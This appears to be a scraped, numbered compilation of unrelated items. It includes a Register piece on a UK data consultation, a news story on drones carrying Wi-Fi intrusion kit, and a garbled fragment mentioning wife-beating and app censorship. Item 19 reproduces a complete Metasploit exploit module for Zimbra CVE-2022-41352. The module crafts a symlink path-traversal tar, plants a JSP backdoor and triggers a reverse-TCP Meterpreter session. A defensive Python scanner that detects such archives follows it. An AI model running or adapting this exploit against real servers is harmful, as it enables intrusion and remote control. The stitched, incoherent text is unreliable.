"Data is a non-depletable resource in theory, but its use is limited by barriers to its access – such as when data is hoarded, when access rights are unclear or when organisations do not make good use of the data they already have. These barriers undermine the performance of public services and our economy, risking poorer outcomes for citizens. We will ensure that data can be leveraged to deliver new and innovative services, promote stronger competition, and better prices and choice for consumers and small businesses," promised Dowden at the launch of the consultation. ®

Via theregister.com
18. Go play around at def.camp, there's a multitude of challenges here
19. This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running Zimbra Collaboration Suite 9.0.0 Patch 26 and below and Zimbra Collaboration Suite 8.8.15 Patch 33 and below.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TAR Path Traversal in Zimbra (CVE-2022-41352)',
        'Description' => %q{
          This module creates a .tar file that can be emailed to a Zimbra server to
          exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor
          in the public web directory, then executes that backdoor.

          The core vulnerability is a path-traversal issue in the cpio command-
          line utility that can extract an arbitrary file to an arbitrary location
          on a Linux system (CVE-2015-1197). Most Linux distros have chosen not
          to fix it.

          This issue is exploitable on Red Hat-based systems (and other hosts
          without pax installed) running versions:

          * Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier)
          * Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier)

          The patch simply makes "pax" a pre-requisite.
        },
        'Author' => [
          'Alexander Cherepanov', # PoC (in 2015)
          'yeak', # Initial report
          'Ron Bowes', # Analysis, PoC, and module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-41352'],
          ['URL', 'https://forums.zimbra.org/viewtopic.php?t=71153&p=306532'],
          ['URL', 'https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2015/01/18/7'],
          ['URL', 'https://lists.gnu.org/archive/html/bug-cpio/2015-01/msg00000.html'],
          ['URL', 'https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis'],
          ['URL', 'https://attackerkb.com/topics/FdLYrGfAeg/cve-2015-1197/rapid7-analysis'],
          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27'],
          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34'],
        ],
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Zimbra Collaboration Suite', {} ]
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
          'TARGET_PATH' => '/opt/zimbra/jetty_base/webapps/zimbra/',
          'TARGET_FILENAME' => nil,
          'DisablePayloadHandler' => false,
          'RPORT' => 443,
          'SSL' => true
        },
        'Stance' => Msf::Exploit::Stance::Passive,
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2022-06-28',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'payload.tar']),
        # Separating the path, filename, and extension allows us to randomize the filename
        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (an absolute path - eg, /opt/zimbra/...).']),
        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: public/<random>.jsp).']),
      ]
    )

    register_advanced_options(
      [
        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (default: random)']),
        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),
        # Took this from multi/handler
        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
      ]
    )
  end

  def exploit
    print_status('Encoding the payload as .jsp')
    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)

    # Small sanity-check
    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
    end

    # Generate a filename if needed
    target_filename = datastore['TARGET_FILENAME'] || "public/#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp"
    symlink_filename = datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10)

    # Sanity check - the file shouldn't exist, but we should be able to do requests to the server
    if datastore['TRIGGER_PAYLOAD']
      print_status('Checking the HTTP connection to the target')
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_filename)
      )

      unless res
        fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')
      end

      # Break when the file successfully appears
      unless res.code == 404
        fail_with(Failure::Unknown, "Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code})")
      end
    end

    # Create the file
    begin
      contents = StringIO.new
      Rex::Tar::Writer.new(contents) do |t|
        print_status("Adding symlink to path to .tar file: #{datastore['TARGET_PATH']}")
        t.add_symlink(symlink_filename, datastore['TARGET_PATH'], 0o755)

        print_status("Adding target file to the archive: #{target_filename}")
        t.add_file(File.join(symlink_filename, target_filename), 0o644) do |f|
          f.write(payload)
        end
      end
      contents.seek(0)
      tar = contents.read
      contents.close
    rescue StandardError => e
      fail_with(Failure::BadConfig, "Failed to encode .tar file: #{e}")
    end

    file_create(tar)
    print_good('File created! Email the file above to any user on the target Zimbra server')

    # Bail if they don't want the payload triggered
    return unless datastore['TRIGGER_PAYLOAD']

    register_file_for_cleanup(File.join(datastore['TARGET_PATH'], target_filename))

    interval = datastore['CheckInterval'].to_i
    print_status("Trying to trigger the backdoor @ #{target_filename} every #{interval}s [backgrounding]...")

    # This loop is mostly from `multi/handler`
    stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i
    timeout = datastore['ListenerTimeout'].to_i
    loop do
      break if session_created?
      break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)

      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_filename)
      )

      unless res
        fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
      end

      # Break when the file successfully appears
      if res.code == 200
        print_good('Successfully triggered the payload')
        # This should break when we get to session_created?
      end

      Rex::ThreadSafe.sleep(interval)
    end
  end
end

# 0day.today [2022-10-21]
# Source: 0day.today
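The archive layout the module builds (a symlink entry pointing at an absolute directory, followed by a regular file whose path runs through that symlink) is what a naive extractor such as the cpio invocation described above follows out of the extraction directory. The following is an added example, not part of the Metasploit module: it reproduces that layout with Python's tarfile so the pattern can be seen on disk, and pairs it with the check a mail gateway or sandbox would want, a scanner that flags absolute or parent-relative member names, symlinks that escape the archive, and any member whose path passes through an earlier symlink. The link name, target directory, .jsp path and file content are illustrative assumptions.

```python
# Added example, not the Metasploit module's code: build the symlink-then-file
# archive the module describes and scan archives for that pattern.
# Link name, target directory and .jsp path are illustrative assumptions.
import io
import posixpath
import tarfile


def build_symlink_tar(link_name: str, link_target: str, inner_path: str, content: bytes) -> bytes:
    """Layout: <link_name> -> <link_target>, then <link_name>/<inner_path> as a regular file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo(link_name)
        link.type = tarfile.SYMTYPE
        link.linkname = link_target
        link.mode = 0o755
        tar.addfile(link)
        member = tarfile.TarInfo(posixpath.join(link_name, inner_path))
        member.size = len(content)
        member.mode = 0o644
        tar.addfile(member, io.BytesIO(content))
    return buf.getvalue()


def build_plain_tar(name: str, content: bytes) -> bytes:
    """Single regular-file archive, used as the benign comparison case."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        member = tarfile.TarInfo(name)
        member.size = len(content)
        tar.addfile(member, io.BytesIO(content))
    return buf.getvalue()


def find_unsafe_members(tar_bytes: bytes) -> list:
    """Return (member_name, reason) pairs a naive extractor would write outside
    the extraction directory: absolute or '..' paths, symlinks that point outside
    the archive, and entries whose path passes through an earlier symlink
    (the CVE-2015-1197 / CVE-2022-41352 pattern)."""
    findings = []
    symlinks = {}  # normalized link path -> resolved target, in archive order
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for m in tar:
            name = posixpath.normpath(m.name)
            if name.startswith("/") or name == ".." or name.startswith("../"):
                findings.append((m.name, "absolute or parent-relative path"))
                continue
            if m.issym():
                target = m.linkname
                if not target.startswith("/"):
                    target = posixpath.normpath(posixpath.join(posixpath.dirname(name), target))
                if target.startswith("/") or target == ".." or target.startswith("../"):
                    findings.append((m.name, f"symlink escapes archive: -> {m.linkname}"))
                symlinks[name] = target
                continue
            # Any directory prefix of this member that is a known symlink means the
            # file lands wherever the link points, not under the archive root.
            parts = name.split("/")
            for i in range(1, len(parts)):
                prefix = "/".join(parts[:i])
                if prefix in symlinks:
                    findings.append((m.name, f"path passes through symlink {prefix} -> {symlinks[prefix]}"))
                    break
    return findings


def demo():
    """Constructed inputs: the module's layout with placeholder names, and a benign archive."""
    malicious = build_symlink_tar("ab", "/opt/zimbra/jetty_base/webapps/zimbra/",
                                  "public/x.jsp", b"<%-- placeholder, not a real payload --%>")
    benign = build_plain_tar("report/notes.txt", b"hello")
    return find_unsafe_members(malicious), find_unsafe_members(benign)
```

The scanner walks members in archive order on purpose: the attack depends on the symlink being created before the file that traverses it, so a single pass with a running map of symlinks is enough. On Python 3.12 (and the security backports to 3.8-3.11), TarFile.extractall(filter="data") refuses both members of the malicious archive by itself; the explicit scan is for pipelines that hand archives to an external extractor with no such filter, which is exactly the cpio situation the module relies on.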
20. I think you want to beat your wife and have no reason to; BDSM, Liveleak, etc... he'll learn about 314zda in time too, ... oaza and so on are legit apps for Android, iOS etc... you pay, you censor the apps mentioned above for the kid, and you can sleep easy.
21. Check your rooftops: Flying gear caught carrying network-intrusion kit

Modified off-the-shelf drones have been found carrying wireless network-intrusion kit in a very unlikely place.

The idea of using consumer-oriented drones for hacking has been explored over the past decade at security conferences like Black Hat 2016, in both the US and Europe. Naomi Wu, a DIY tech enthusiast, demonstrated a related project called Screaming Fist in 2017. And in 2013, security researcher Samy Kamkar demonstrated his SkyJack drone, which used a Raspberry Pi to take over other drones via Wi-Fi.

Now these sorts of attacks are actually taking place. Greg Linares, a security researcher, recently recounted an incident that he said occurred over the summer at a US East Coast financial firm focused on private investment. He told The Register that he was not involved directly with the investigation but interacted with those involved as part of his work in the finance sector.

The Register corresponded with an individual affiliated with the affected company who corroborated Linares's account and asked not to be identified owing to a non-disclosure agreement and employment concerns.

In a Twitter thread, Linares said the hacking incident was discovered when the financial firm spotted unusual activity on its internal Atlassian Confluence page that originated from within the company's network. The company's security team responded and found that the user whose MAC address was used to gain partial access to the company Wi-Fi network was also logged in at home several miles away. That is to say, the user was active off-site but someone within Wi-Fi range of the building was trying to wirelessly use that user's MAC address, which is a red flag.

The team then took steps to trace the Wi-Fi signal and used a Fluke system to identify the Wi-Fi device.

"This led the team to the roof, where a 'modified DJI Matrice 600' and a 'modified DJI Phantom' series were discovered," Linares explained.

The Phantom drone was in fine condition and had a modified Wi-Fi Pineapple device, used for network penetration testing, according to Linares. The Matrice drone was carrying a case that contained a Raspberry Pi, several batteries, a GPD mini laptop, a 4G modem, and another Wi-Fi device. It had landed near the building's heating and ventilation system and appeared to be damaged but still operable.

"During their investigation, they determined that the DJI Phantom drone had originally been used a few days prior to intercept a worker's credentials and Wi-Fi," Linares said. "This data was later hard coded into the tools that were deployed with the Matrice."

According to Linares, the tools on the drones were used to target the company's internal Confluence page in order to reach other internal devices using the credentials stored there. The attack, he said, had limited success and is the third cyberattack involving a drone he's seen over the past two years.

"The attackers specifically targeted a limited access network, used by both a third-party and internally, that was not secure due to recent changes at the company (e.g. restructuring/rebranding, new building, new building lease, new network setup or a combination of any of these scenarios)," Linares told The Register. "This is the reason why this temporary network unfortunately had limited access in order to login (credentials + MAC security). The attackers were using the attack in order to access an internal IT confluence server that contained other credentials for accessing other resources and storing IT procedures."

Long-term problem comes to life

Linares said he had worked on a drone project in 2011 to test network attack capabilities and at the time, power, carry weight, and range were limiting factors. "We revisited it again in 2015 and drone tech had come a long way," he said.

"Now in 2022 we are seeing really amazing drone advancements in power, range, and capabilities (for instance, the amazing synchronized drone shows that China puts out are utterly fantastic)."

"This paired with drone payload options getting smaller and more capable – e.g. Flipper Zero kit – ... make viable attack packages that are reasonable to deploy," said Linares. "Targets in fintech/crypto and supply chain or critical third-party software suppliers would make ideal targets for these attacks where an attacker can easily cover their initial operating costs with immediate financial gain or access to more lucrative targets."

Via theregister.com
22. North Korea is blurred on G map. PS: I didn't listen to the video